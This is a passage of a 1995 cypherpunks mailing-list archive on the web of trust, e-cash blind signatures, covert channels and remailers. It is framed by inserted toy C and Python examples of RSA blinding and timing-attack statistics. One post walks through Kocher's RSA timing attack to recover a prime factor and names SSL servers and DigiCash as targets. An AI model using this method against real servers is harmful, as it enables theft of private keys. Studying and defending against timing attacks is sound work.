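/* Chaum-style flow: the REQUESTER owns r.  The signer is handed only the
 * blinded value (*seen_by_signer) and never learns m or the final signature.
 * Returns 0 if r is not invertible mod n. */
static uint64_t chaum_blind_sign(uint64_t m, uint64_t r,
                                 uint64_t *seen_by_signer)
{
    uint64_t r_inv = modinv(r, RSA_N);          /* requester side */
    if (r_inv == 0)
        return 0;
    *seen_by_signer = blind(m, r);              /* sent to the signer */
    uint64_t s_blinded = rsa_private(*seen_by_signer);   /* signer side */
    return unblind(s_blinded, r_inv);           /* requester side */
}

/* Defensive blinding: the SIGNER owns r and knows m.  The output is an
 * ordinary signature; only the value fed to the exponentiation
 * (*exponentiated) is randomized, so its timing is decoupled from m.
 * Returns 0 if r is not invertible mod n (caller retries with a new r). */
static uint64_t defensive_sign(uint64_t m, uint64_t r,
                               uint64_t *exponentiated)
{
    uint64_t r_inv = modinv(r, RSA_N);
    if (r_inv == 0)
        return 0;
    *exponentiated = blind(m, r);
    return unblind(rsa_private(*exponentiated), r_inv);
}

int main(void)
{
    uint64_t seen = 0, fed = 0;
    uint64_t m = 65;                            /* constructed message */
    printf("plain signature      : %llu\n", (unsigned long long)rsa_private(m));
    printf("Chaum blind signature: %llu (signer saw %llu)\n",
           (unsigned long long)chaum_blind_sign(m, 7, &seen),
           (unsigned long long)seen);
    printf("defensive blinding   : %llu (exponentiated %llu)\n",
           (unsigned long long)defensive_sign(m, 1234, &fed),
           (unsigned long long)fed);
    return 0;
}
```

The arithmetic is identical in both flows; what differs is which party holds `r`, and therefore whether the signer ever sees the message and the finished signature.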






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Thu, 14 Dec 1995 06:24:38 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Web O Trust, active attacks against same, etc.  AGAIN.  (was: Usability of Cryptography (was Re: More FUD from First Virtual) )
In-Reply-To: <199512130722.XAA11947@blob.best.net>
Message-ID: <199512132039.NAA14799@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 An entity calling itself "James A. Donald" <jamesd@echeque.com> 
allegedly wrote:
>
> Web of trust is a mess because it attempts to link keys to 
> physical people, which in general cannot be done.
                   *******************************


Do you wish to substantiate this rather brazen assertion?  
I am very sure that PGP public key 0xCC56B2E9 belongs to my
housemate Sebastian Kuzminsky <kuzminsk@colorado.edu>.  Is
there some reason why I should doubt this belief?


Furthermore my mother <rwilcox@mesa5.mesa.colorado.edu>
<0x5E93210D> is very sure that PGP public key 0x617c6db9
belongs to me, and she is very sure that I am a trustworthy
introducer of keys.  Is there some reason why she should
abstain from associating Seb's key <0xCC56B2E9> in her mind
with my housemate?


> If we stick to a lesser goal -- constancy of identity -- 
> this is not so hard.  In general it is impossible to prove that 
> Bryce is the "real" Bryce, but it is trivial to prove that 
> Bryce is the same Bryce who has a certain Web page, and the
> same Bryce who posted a certain article in archives.


But if I am the victim of a successful active attack then you
are *not* certain that I am the same Bryce.  The Bryce who
posted a certain article in the archives might be completely
different from (and antagonistic toward!) the Bryce who later
contacts you in e-mail using the same public key.  Do you see
why?


> We should blow off this attempt to do the impossible.


It is far from impossible.  In fact, it is easy if we pay
attention and cooperate.  


Note that I am in complete agreement with you about the (non-)
value of "True" identities.  In the above example I do not 
expect you to care which Bryce is the "real" Bryce, but I *do* 
expect you to care that the two Bryces are different.


In short, the Web O Trust is important to maintain constancy
of identity.  It is not trivial, but neither is it impossible,
to do so.


Regards,

Bryce, a unique and autonomous entity


signatures follow


      "To strive, to seek, to find and not to yield."  -Tennyson
            <a href="http://www.c2.org/~bryce/Niche.html">

                          bryce@colorado.edu                </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMM855vWZSllhfG25AQG8JQP+Ikc9sfUdEQHhLTM1/cTlimFBKB/ppifD
N58Eh6e6UboOeoatcLdHgEEkrewhYkVD+AcIoV5CUHLt22Q88vjH2Fq9jJ+tV3CO
65r9kyVeIg49qQZHx0FrSTytoTrY3Zg9RdJoh4zT/Vy36dCcwgRcfAzkPdMBfQqU
W9mViQbS5w0=
=KyrB
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jas (Matthew K) <matt@lordmuck.itd.uts.edu.au>
Date: Wed, 13 Dec 1995 13:45:07 +0800
To: cypherpunks@toad.com
Subject: Using quantum cryptography to effect covert channels
Message-ID: <199512130321.OAA12208@lordmuck.itd.uts.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


B2, B3 and A1 systems (Orange book) use covert channel analysis to
prevent leakages of information (intentional or otherwise). This forms
a part of enforcing MAC on such systems. well recently i thought of a
method to overcome these barriers so covert channels can again be used
to transmit and receive from such machines. this method involves using
quantum cryptography.

"randomization" is one method used to prevent covert channels, however
it is this "randomization" that can be used with quantum crypto to not
only make covert channels, but also makes the covert channels secure
as well as authenticated!

basically quantum crypto uses the fact that observing a system
modifies the system. this works on machines that use "randomization"
as a method of deterring covert channels. ObExample, if an admin gets
suspicious of certain behaviour on a machine, the machine behaves
differently if he tries to investigate it (as a result of "poking
around" the machine to see what is going on).

this can be used with quantum crypto methods to covertly communicate
data (with security and authentication), and if someone attempts to
"observe" the behaviour on the said machines, it will break the
communication (because the machine behaviour changes, hence breaks the
message) rendering the message unreadable. this may slow down
communication some, and will need self-synchronization of some sort,
but at least you can communicate.

this idea is very rough however, and there may be gaping holes in my
arguments, but i think it might be an area someone may wish to look
into (especially the high assurance types). i really should write a
draft paper on this, but i don't really have a good enough
understanding of the formal methods to pull it off. however i have got
a coining name for this method, "covert quantum channels".

just a random thought to throw around...

			Matt
-- 
#!/bin/sh
echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sbA0D3F204445524F42snlbxq'|dc;exit
Matthew Keenan   Systems Programmer   Information Technology Division
      University of Technology     Sydney Australia

It's nice to be in a position where people apologize because they
assume there's humor in your work, based on past experience,
but they're not sure where it is. -- Rob Pike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Thu, 14 Dec 1995 08:18:11 +0800
To: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Subject: Re: PGP/PINE integration
In-Reply-To: <Pine.ULT.3.91.951213014345.22977C-100000@krypton.mankato.msus.edu>
Message-ID: <199512132126.OAA17578@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 Robert Hayden <hayden@krypton.mankato.msus.edu>
>
> For those that don't need quite this much or don't have access to pine at 
> the install level (often for university systems with a central software 
> depository), I have a script called PineSign available on my home page 
> (or email me) that will allow simple PGP signing of your pine mailings 
> and postings.  It doesn't do encryption, but works great for signatures.


And my "Bryce's Easy PGP" script, whose creation was inspired
by Mr. Hayden's PineSign, does both encryption and
signing, and supports decryption (ugly but usable with Pine).
BAP is an sh script, so it is useful with many Unix message
utilities.  I myself use it for all my messages with mh and
trn.


You can buy BAP for 2 US $, payable in Mark Twain Ecash, at my 
WWW site, <a href="http://www.c2.org/~bryce/Niche.html"> 
the Niche </a>, or if you are one of those backwards blokes who 
doesn't have Ecash yet, e-mail me and I'll give you a 
complimentary copy.


Regards,

Bryce

signatures follow


      "To strive, to seek, to find and not to yield."  -Tennyson
            <a href="http://www.c2.org/~bryce/Niche.html">

                          bryce@colorado.edu                </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMM9E7/WZSllhfG25AQHjygP6A0vl0CJyxE8gtEJSH/akRYDyoStCiic4
adZPJTi43bZ0NoZdzYWzNWq3+cJzyvzUIjnj8AynohET61w6czO7ItRtDRuUPuKG
fJEoZh8U65UyZwcIISTVAg10yxoEnF6BjkP9dUGshe/XMt1ydEtgEwj/l2DciZ+K
v6ibPETpfbg=
=VygP
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Klur" <dklur@dttus.com>
Date: Thu, 14 Dec 1995 06:39:10 +0800
Subject: Re[2]: e-Cash: CAFE vs. Mondex
Message-ID: <9511138188.AA818893347@cc2.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     >Matthias Schunter Said
     
     [snip]
     
     >The CAFE system is a cheque based system. This means that the 
     >customer receives an electronic chequebook, where each cheque is 
     >(blindly) signed by the bank.
     >During each payment the customer has to use one of these signed
     >cheques.
     
     [snip]
     
     If the CAFE card contains cheques (which are not digital cash, and 
     therefore must be tied back to a customer's checking account), how can 
     the bank blindly sign them?  The merchant will have to deposit the 
     cheque in order to transfer the money out of the customer's account and 
     into the merchant's account.  I don't see how the bank can not know the 
     identity of the customer.
     
     This is why digital cash can be anonymous - because once the bank 
     (blindly) signs the cash tokens, these tokens ARE money.  They are not 
     pointers (in the case of cheques) to customers' bank accounts.
     
     However, if Alice (the customer) contacts her bank and requests a 
     cheque be made out to Bob (the vendor) for, say, $12.50 then the bank 
     can withdraw $12.50 from Alice's account and blindly sign a cheque for 
     $12.50 payable only to Bob.  Then the bank would not know Alice's 
     identity.  I don't think this is how CAFE works, since CAFE is 
     designed as an off-line smart card system.  Therefore, Alice cannot 
     request bank cheques from her bank made payable to Bob when she walks 
     into Bob's store.
     
     Maybe your definition of a cheque is different than mine?
______________________________ Reply Separator _________________________________
     
     





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@bilbo.suite.com (Jim Miller)
Date: Thu, 14 Dec 1995 08:19:42 +0800
To: cypherpunks@toad.com
Subject: Attacking Clipper with timing info?
Message-ID: <9512132111.AA18490@bilbo.suite.com>
MIME-Version: 1.0
Content-Type: text/plain



Could this timing attack be used to obtain the various keys used by  
Clipper devices?

Jim_Miller@suite.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 14 Dec 1995 08:22:03 +0800
To: The user formerly known as Leslie Todd Masco <cactus@hks.net>
Subject: [NOISE] Re: And the standard continues to lower...
In-Reply-To: <199512132152.QAA23054@bb.hks.net>
Message-ID: <Pine.ULT.3.91.951213150858.29781A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 13 Dec 1995, The user formerly known as Leslie Todd Masco wrote:

> If the misuse of "One Time Pad" wasn't enough for ya, check out this ad that
> I was e-mailed.
> 
> And the chair of a CS department, no less.

I don't believe you'll find that particular college in US News & World 
Report.
 
> - ------- start of forwarded message (RFC 934 encapsulation) -------
> Subject: Secure No-overhead Online Order System for Publishers
> Date: Wed, 13 Dec 1995 12:24:03 -0800 (PST)
> 
> A secure no-overhead online title-ordering system is now available. It may
> be viewed in operation at the home page for Blue Water Publishing, a
> publisher, software developer and distribution company, at 
> http://www.bluewaterp.com/~bcrissey/
> or from the online bookstore area of ISCNI, the Institute for the Study of
> Contact with Non-Human Intelligence at
> http://www.iscni.com

"Beam me up, Scotty. There's no intelligent life down here."

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMM9dmo3DXUbM57SdAQEU5gQAtaJJJ9975vln12JWkCHviXXOC6xIGJo0
gxPeTRha4i7e++G7VrZ9Z2QM2QRIhEDj4c2vBMbCNdCwfyGGmpV/+ykqVMMfppEk
B2doHMizkGLju0gSobE4MOvNQyO6jLavJnpee/QgR7eaHs6iVb7yzhYqcOfRmLeo
BlYK0ACngT0=
=oC/C
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bob Bruen, MIT Lab for Nuclear Science" <BRUEN@mitlns.mit.edu>
Date: Thu, 14 Dec 1995 06:21:16 +0800
To: cypherpunks@toad.com
Subject: OSF security announcement
Message-ID: <951213151725.60204104@mitlns.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



 The following is part of an OSF announcement. Most of the marketing
 hype has been deleted, but I thought the security part would be of interest.

                                      Bob
------------------------------------------------------------------
CAMBRIDGE, MA, December 12, 1995  --  The Open Software
Foundation (OSF) today announced the DCE-Web Advanced
Technology Offering (ATO).  The goal of this software
project is to provide all of the essential capabilities
of the distributed computing environment (encryption,
                                           ^^^^^^^^^
--snip---

* Secure Local Proxy - provides secure DCE-Web access
  using standard off-the-shelf browsers. It is possible
  to access DCE-Web using any browser without any
  modification. The Secure Local Proxy functions as
  protocol switch, forwarding proxy requests either as
  standard http or using the secure DCE-Web protocol.

* Secure Gateway - integrates the DCE-Web with other
  secure Web protocols. The Gateway provides secure
  access to the Multi-protocol Server, providing DCE
  authentication based on public key identities. The
  gateway is designed to allow plug-in access for
  multiple public key Web protocols.

--snip--

For more information on this ATO please refer to the
project home page at http://www.osf.org/www/dceweb/.

--snip---
CONTACT:	Jane Smeloff
		Open Software Foundation
		(617) 621-8997
		Email: jane@osf.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 14 Dec 1995 07:30:23 +0800
To: gbroiles@darkwing.uoregon.edu
Subject: Re: e-mail forwarding, for-pay remailers
Message-ID: <01HYRJSUSFLS8Y4Z3G@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"gbroiles@darkwing.uoregon.edu"  "Greg Broiles" 13-DEC-1995 03:40:50.49

>I don't have much faith that the people who are currently doing the DNS
for my domain name (goldenbear.com) are going to do anything about the
current bouncing-messages phenomenon anytime soon, so I'm looking into other
ways to get & send E-mail (e.g., more persistent than this address which
will disappear when I'm done with school in ~ 6 months). I've found a few
services which may be of interest to C-punks because they're useful for
creating/maintaining persistent cyberspace identities with no necessary
connection to a "real name".

[...]

netbox.com ( http://www.netbox.com ) provides web pages and E-mail storage
or forwarding for people; they let you sign up for a trial month for free.
They ask for name/address/phone (which could easily be a Mailboxes Etc
address and a voicemail from Mailboxes Etc or whatever) and accept payment
by check or credit card. They'll store incoming email or forward it to
another account. They'll do header rewriting (similar to the anonymous
remailers) so that outgoing mail looks like it came from this address.
--------------------
       There's one problem with this in regards to the "no necessary
connection," and that's the governmental requirement for mail forwarding. MBE
and any legal other one will want to see at least two forms of ID including one
photo, and have a form that they fill out using that and send to the local
post office. Anyone have a way around this problem?
       -Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthias Schunter <schunter@informatik.uni-hildesheim.de>
Date: Thu, 14 Dec 1995 02:23:18 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: e-Cash: CAFE vs. Mondex
Message-ID: <v02120d1bacf49fab0a7a@[147.172.54.29]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:46 Uhr 13.12.1995, Adam Shostack wrote:
>Matthias Schunter wrote:
>
>| The CAFE system is a cheque based system. This means that the
>| customer receives an electronic chequebook, where each cheque is
>| (blindly) signed by the bank.  
>| During each payment the customer has to use one of these signed cheques.
>
>|  privacy-protecting
>|    The privacy of the user is protected.
>
>        How do checks protect the privacy of the user?  The bank
>knows who is spending how much with whom for each check.

No. The cheques are certified blindly. 
I.e., the bank does not see them during signing/withdrawal and therefore does
not re-recognize them.

However, the bank does know how much money each participant receives or 
spends, but not who's paying whom.


m

% Matthias <Schunter@acm.org> Uni Hildesheim +49(5121)883-788 fax-732
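
[Added example, not part of the original messages and not CAFE code: blind certification as described in the exchange above, sketched with Chaum's RSA blind signature as a stand-in, since the posts do not say which scheme CAFE uses. The key, the serial strings and all function names are constructed for illustration.]

```python
import hashlib
import math
import secrets

# Constructed toy bank key: two Mersenne primes, far too small for real use.
P, Q = 2**31 - 1, 2**61 - 1
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))   # bank's private exponent


def cheque_digest(serial: bytes) -> int:
    """Map a cheque serial to an integer mod N (hypothetical encoding)."""
    return int.from_bytes(hashlib.sha256(serial).digest(), "big") % N


def blind(serial: bytes):
    """Customer side: hide the cheque behind a random factor r."""
    m = cheque_digest(serial)
    while True:
        r = secrets.randbelow(N - 2) + 2
        if math.gcd(r, N) == 1:
            break
    return (m * pow(r, E, N)) % N, r


def bank_sign(blinded: int) -> int:
    """Bank side: debit the account and sign what it is shown.
    The bank sees only the blinded value, never the cheque itself."""
    return pow(blinded, D, N)


def unblind(blind_sig: int, r: int) -> int:
    """Customer side: strip r to get an ordinary signature on the cheque."""
    return (blind_sig * pow(r, -1, N)) % N


def verify(serial: bytes, sig: int) -> bool:
    """Merchant or bank at deposit: check the bank's signature."""
    return pow(sig, E, N) == cheque_digest(serial)


def explaining_factor(blinded: int, serial: bytes) -> int:
    """The blinding factor that would tie this withdrawal record to this
    cheque. One exists for every (record, cheque) pair, which is why the
    bank cannot tell which withdrawal a deposited cheque came from."""
    m = cheque_digest(serial)
    return pow(blinded * pow(m, -1, N) % N, D, N)


if __name__ == "__main__":
    record, r = blind(b"cheque-0001")          # what the bank logs at withdrawal
    sig = unblind(bank_sign(record), r)
    print("cheque verifies:", verify(b"cheque-0001", sig))
    # Any other cheque "explains" the same withdrawal record equally well.
    r_other = explaining_factor(record, b"cheque-0002")
    fits = cheque_digest(b"cheque-0002") * pow(r_other, E, N) % N == record
    print("record also consistent with cheque-0002:", fits)
```

This shows only the unlinkability of withdrawal and deposit; the bank still sees the amounts withdrawn and deposited by each account holder.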






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 14 Dec 1995 06:30:02 +0800
To: jamesd@echeque.com
Subject: Re: Usability of Cryptography (was Re: More FUD from First Virtual)
Message-ID: <01HYRK16QTSM8Y4Z3G@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"jamesd@echeque.com"  "James A. Donald" 13-DEC-1995 03:44:41.99

>If we stick to a lesser goal -- constancy of identity -- 
this is not so hard.  In general it is impossible to prove that 
Bryce is the "real" Bryce, but it is trivial to prove that 
Bryce is the same Bryce who has a certain Web page, and the
same Bryce who posted a certain article in archives.
-----------------
        I have been considering all the pieces of information that ought to
be automatically linkable to a particular public key. They include:

1. Email address(es) from which mail signed with it is customarily received,
to save on lookup time.

2. Web pages put up by this person.

3. Web pages/ftp files/etcetera authored by this person (i.e., the hks archives
of cypherpunks).

4. Phone number if using a crypto-capable phone with a key-download capacity
from a computer.

5. A declared name or alias.

6. In my files, whatever name I want to give the person.

Ultimately, if I receive something signed by somebody, I would want to have
hypertext links from that file to all of these- to remind me of whom I'm
talking to and his/her/its/their past behavior.
      -Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The user formerly known as Leslie Todd Masco <cactus@hks.net>
Date: Fri, 15 Dec 1995 10:08:49 +0800
To: cypherpunks@toad.com
Subject: And the standard continues to lower...
Message-ID: <199512132152.QAA23054@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


If the misuse of "One Time Pad" wasn't enough for ya, check out this ad that
I was e-mailed.

And the chair of a CS department, no less.

- ------- start of forwarded message (RFC 934 encapsulation) -------
Subject: Secure No-overhead Online Order System for Publishers
Date: Wed, 13 Dec 1995 12:24:03 -0800 (PST)

A secure no-overhead online title-ordering system is now available. It may
be viewed in operation at the home page for Blue Water Publishing, a
publisher, software developer and distribution company, at 
http://www.bluewaterp.com/~bcrissey/
or from the online bookstore area of ISCNI, the Institute for the Study of
Contact with Non-Human Intelligence at
http://www.iscni.com

Blue Water's innovative online ordering system is called SimplySafe. It is
a needle-in-the-haystack approach to online security.  It requires no
encryption or secure servers, yet the probability that a dedicated hacker
scanning 100 internet messages a second will intercept a usable credit
card number sent via SimplySafe is less than the probability of picking
our Sun out of the Milky Way.  That is less than 1 in 200 billion.  Safe
enough for most folks.  There are easier ways for a hacker to pick up
credit card numbers than to waste time with SimplySafe transactions.  Try
it out!

SimplySafe currently supports secure online orders from Blue Water
Publishing, Wild Flower Press, Swan-Raven & Co., and ISCNI.
Direct inquiries to 
SimpleSafe@aol.com

***Dr. Brian L. Crissey, Chair CS Dpt, Linfield Col., McMinnville, OR 97128
(503)-434-2426 brianc@linfield.edu
Professionals built the Titanic, amateurs built the Ark...


- ------- end -------
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMM9LGSoZzwIn1bdtAQEtqwGAnH6mMxeUPhVn/js6zJKocvMwKnN5+VHv
95Zwe2qL3cZOycluLA4Qxl20buL8PApy
=VS5o
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Francisco Encarnacao" <francis@e-mail.com>
Date: Thu, 14 Dec 1995 10:30:58 +0800
To: cypherpunks@toad.com
Subject: (U)
Message-ID: <9512132200.AA13025@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


                                                                               
SUBSCRIBRE                                                                     
                                                                               
Regards,                                                                       
Francisco Encarnacao - Equipment Maintenance Technician                        
Internet E-mail address:Francis@e-mail.com                                     




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 14 Dec 1995 14:02:29 +0800
To: cypherpunks@toad.com
Subject: Timing attack against RSA
Message-ID: <199512140116.RAA22256@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Here is how I gather the timing attack against RSA decryption would
work.  This is the chosen-ciphertext attack of Paul Kocher's.

You know n, the public modulus; suppose it is 512 bits.  You want to
know p and q, its prime factors.  You know the details of the server's
implementation of RSA.  The server will do a decryption of the RSA
message you send it, and give you some reply shortly after it is
finished.

You are going to send it bogus messages.  Normally, most random
messages will encrypt under RSA to numbers of about 512 bits, but you will
send it ciphertext which is about 256 bits long.  You are going to try
to figure out the value of p.

The server's algorithm is to take the ciphertext c, and first do:

cp = c mod p
cq = c mod q

It will then do two modular exponentiations, mod p and mod q, and do a
few more calculations, then return some result to you.

The attack is to try to choose c to be about the same size as p, with the
assumption being that if c is a bit less than p then c mod p will be fast
since it doesn't have to do anything, while if c is somewhat larger than
p then c mod p will be a little slower, since it will have to at least
subtract p from c.  Paul Kocher has measured this timing difference as 17
microseconds on one particular implementation.

This is not going to be an easy time difference to measure.  In
addition to doing the c mod p step, the algorithm also does all those
other things:  the c mod q, the two RSA calculations, as well as
whatever overhead is involved in the server's operation and the
communication link.  The variations due to the RSA calculations
themselves will have a standard deviation of about 250 microseconds,
based on Paul's numbers (higher than his reported value because two
exponentiations are done, plus some other work).  So this is a minimum
amount of "noise" we must try to see through even if everything else is
instantaneous.  This might be the situation in the case of a hardware
token which is doing RSA decryptions with a secret key.

The first step will be to try to determine the length of p.  For this
we will send in c values which are around 256 bits long.  We might
start with some 250 bit values and some 260 bit values, hoping that p
is in that range.  We do a whole lot of these, and we take the average
time for them.  If p is between 250 and 260 bits long, then the 260 bit
values should take at least 17 microseconds more time to calculate on
the average than the 250 bit values.

One interesting question is how many samples we would have to take in
order to detect this difference.  One way to consider it is to ask,
given that the samples have a standard deviation of about 250
microseconds, how many samples do we have to take to reliably estimate
the mean within an accuracy of about 10 microseconds, or 1/25 of a
standard deviation?

According to my limited knowledge of statistics, if we want to be right
about 90% or 95% of the time, we need to have sqrt(number-of-samples) *
1/25 be > 3, or number-of-samples should be about 5000.  (Take this
with a large grain of salt!)  So we will have to do some thousands of
samples in order to average out the noise and get our mean this
accurate, with good confidence.

Once we have done these tests, we have determined that p is between our
two values.  Now we can sub-divide the interval and poll with values
which are, say, 255 bits long.  Again, we would have to do enough polls
to determine the true mean time to within about 10 microseconds.

After we repeat this three or four times, we will know the bit length
of p; in effect, we know its first bit.  Now we can continue the
divide and bracket procedure.  Each time, we must poll many times with
c values whose most significant bits are halfway between the two
bracketing values which we know contain p.  Each such sequence of about
5000 polls yields us one more bit of p.

We repeat this about 250 times, and we will have p, from which we can
derive q, and we have broken the RSA key.  So, taking the estimate
above of 5000 or so samples to get a bit of p, we will have to do about
a million tests total to find p.  (BTW, in Paul's implementation it
took about 1/3 second to do a decryption, so you're looking at about
100 days of solid work to do the job.)

This algorithm has some self-correcting features but it is not
completely so.  Suppose p's first bits are actually 1011.  We have
determined that it is between 1000 and 1100, and we want the 3rd bit.
We poll with values which start with 1010, and (since with 90% accuracy
we are wrong 10% of the time) we mistakenly conclude that the mean is
the higher value, hence that p is less than 1010 and must start as
100X.  We continue the procedure, and we will find that our new middle
values are consistently less than p, so we gradually work out our
estimate as 10011111...  Eventually this train of 1's might persuade us
that we may have made a mistake back there, so we would go back and
poll again to try to verify our earlier results.  (Of course, if
another mistake happens during the 1's that will confuse us further...)

Doing the attack across a network will be much more difficult because
there will be a lot more variation in the turnaround time.  This will
have the effect of increasing the standard deviation far above a
quarter millisecond, up by probably at least an order of magnitude if
not two or more.  Now we have to estimate a mean to within not 1/25,
but maybe 1/1000 of a standard deviation, or worse.  This would
increase the total number of samples necessary from a million up to the
level of billions or trillions.

One final note: two cases to which we might want to apply this would be
Netscape's SSL as implemented by its secure servers, and DigiCash's
bank software.  (I know Lucky said that DigiCash is immune to this
attack, but maybe we would want to test it to see.) In either case,
since we are sending a bogus 256 bit value, the data which decrypts
will not be valid.  In the case of SSL we will probably get an error
packet or maybe a broken connection to tell us when it has finished the
decryption.  In the case of DigiCash, it does not need to do anything
with the value it signs other than return it, so we will probably get a
return packet.  However, it is not valid cash.  In order to convince
DigiCash to send us this packet, it has to have deducted something from
our account, at least a penny.  If it takes a billion connections to do
the attack (which I think is an underestimate, corresponding to about a
10 millisecond standard deviation on the timing values), that will cost
10 million dollars.  So you better have pretty deep pockets to think
about mounting this attack in that case.  For SSL, misses don't cost you
anything, so maybe it would be worth trying, if you have a good,
low-latency connection and a server with a light load.  The full attack
would take too long but just determining the length of p would be quite a
coup.

Actually of course you would have to do some more research before
mounting this attack; specifically, you'd want to know more about the
timing of the software so you could estimate the costs of the mod p
operation you are trying to catch.  If the number ends up being much less
than 17 microseconds the attack gets that much harder.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBMM961RnMLJtOy9MBAQFBgAH/WQTMSvRySqNXpfnI4kNXUKQPAleV4NUL
ciaDg9VrY8OOJ0cYO8aZ+RnGn+BKp7WFbIkIKFDO3mSE/o9Be2uI7w==
=ijGI
-----END PGP SIGNATURE-----
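
[Added example, not part of the original message: the sample-count reasoning in the post above, worked through with its own figures (17 and 250 microseconds, 10 microsecond accuracy, about 250 decisions, 10 ms network noise). The Gaussian noise model and the decision threshold at half the timing difference are assumptions of this sketch, and all samples are constructed.]

```python
import math
import random
from statistics import NormalDist, fmean

DELTA_US = 17.0        # timing difference quoted in the post
SIGMA_LOCAL = 250.0    # noise std dev for a local device (microseconds)
SIGMA_NET = 10_000.0   # the post's 10 ms figure for a network path
ACCURACY_US = 10.0     # accuracy the post wants on the estimated mean
KEY_BITS = 250         # number of bracketing decisions in the post


def samples_for_accuracy(sigma_us, accuracy_us=ACCURACY_US, z=3.0):
    """Smallest N with z * sigma / sqrt(N) <= accuracy.
    This is the post's rule that sqrt(N) * (1/25) should exceed 3."""
    return math.ceil((z * sigma_us / accuracy_us) ** 2)


def total_queries(sigma_us):
    """Queries for all decisions at the post's accuracy target."""
    return KEY_BITS * samples_for_accuracy(sigma_us)


def decision_error(n, sigma_us, delta_us=DELTA_US):
    """Chance that the mean of n samples lands on the wrong side of
    delta/2 (assumed decision threshold, Gaussian noise)."""
    std_err = sigma_us / math.sqrt(n)
    return NormalDist().cdf(-(delta_us / 2) / std_err)


def chance_all_correct(n, sigma_us, decisions=KEY_BITS):
    """Probability that every one of the independent decisions is right."""
    return (1.0 - decision_error(n, sigma_us)) ** decisions


def simulate_error(n, sigma_us, trials, seed=1995, delta_us=DELTA_US):
    """Monte Carlo check of decision_error on constructed samples."""
    rng = random.Random(seed)
    wrong = 0
    for t in range(trials):
        slow = t % 2 == 1                     # alternate the true answer
        mean = delta_us if slow else 0.0
        observed = fmean(rng.gauss(mean, sigma_us) for _ in range(n))
        if (observed > delta_us / 2) != slow:
            wrong += 1
    return wrong / trials


if __name__ == "__main__":
    for label, sigma in (("local", SIGMA_LOCAL), ("network", SIGMA_NET)):
        n = samples_for_accuracy(sigma)
        print(f"{label:8s} sigma={sigma:>8.0f}us  per decision={n:>9d}  "
              f"total={total_queries(sigma):>13d}  "
              f"error/decision={decision_error(n, sigma):.4f}  "
              f"all {KEY_BITS} right={chance_all_correct(n, sigma):.2f}")
    print("simulated error, n=200:", simulate_error(200, SIGMA_LOCAL, 2000),
          "analytic:", round(decision_error(200, SIGMA_LOCAL), 3))
```

Under these assumptions the per-decision sample count grows with the square of the noise, which is the scaling the post relies on when it moves from a local device to a network path.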




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Thu, 14 Dec 1995 12:17:17 +0800
To: The user formerly known as Leslie Todd Masco <cactus@hks.net>
Subject: Re: And the standard continues to lower...
Message-ID: <9512132317.AA01174@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Brian L. Crissey includes in his .sig, courtesy of cactus@hks.net
[ much WRT YetAnotherSecureInternetCreditCardPaymentSystem(*tm) deleted ]
> ***Dr. Brian L. Crissey, Chair CS Dpt, Linfield Col., McMinnville, OR 97128
